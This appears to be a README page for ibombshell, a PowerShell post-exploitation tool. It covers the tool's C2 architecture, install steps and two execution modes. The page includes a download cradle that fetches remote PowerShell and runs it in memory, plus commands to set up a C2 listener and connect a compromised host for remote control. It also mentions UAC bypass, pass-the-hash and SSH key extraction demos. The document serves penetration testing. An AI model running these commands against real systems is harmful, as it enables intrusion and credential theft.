ibombshell – Dynamic Remote Shell

ibombshell is a tool written in Powershell that allows you to have a prompt at any time with post-exploitation functionalities (and in some cases exploitation). It is a shell that is downloaded directly to memory providing access to a large number of pentesting features. These functionalities can be downloaded directly to memory, in the form of a Powershell function. This form of execution is known as everywhere.

In addition, it provides a second execution mode called Silently, so the pentester can execute an instance of ibombshell (called warrior). The compromised computer will be connected to a C2 panel through HTTP. Therefore, it will be possible to control the warrior and be able to load functions in memory that help the pentester. This is happening within the post-exploitation phase.

ibombshell C2 scheme

       ibombshell                 C2

            |                      |

            |    newibombshell     |

            +--------------------->| --+ register

            |                      |<--+ from IP

            |    get functions     |

            |   and instructions   |

            +--------------------->|

            |                      |

            |    send functions    |

            |   and instructions   |

execute +-- |<---------------------+

        +-->|                      |

            |       results        |

            +--------------------->|

            |                      |

Install

https://github.com/ElevenPaths/ibombshell.git
cd ibombshell\ c2/
pip install -r requirements.txt

Usage

ibombshell has two execution modes:

• ibombshell everywhere

  To load ibombshell simply run on PowerShell:

  iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’)

   

  Now you can run the downloaded ibombshell console running: console

• ibombshell silently mode

  This version allows you to run the ibombshell console and remotely control it from the C2 panel created in python. To run this version, first you must launch the console process in PowerShell:

  iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/ElevenPaths/ibombshell/master/console’)

   

  On ibombshell C2 path, prepare the C2:

  python3 ibombshell.py

   

  And create the listener where the warriors will be connected:

  iBombShell> load modules/listener.py
  
  [+] Loading module...
  
  [+] Module loaded!
  
  iBombShell[modules/listener.py]> run

   

  The default listener port is 8080. Finally, you can launch the console in silently mode on the host to get remote control:

  console -Silently -uriConsole http://[ip or domain]:[port]

   

Example

1. PoC Warrior + Bypass UAC + Pass the hash
2. macOS
3. Extracting Private SSH Keys on Windows 10
4. PoC savefunctions

Author: ElevenPaths

Source: https://github.com/ElevenPaths/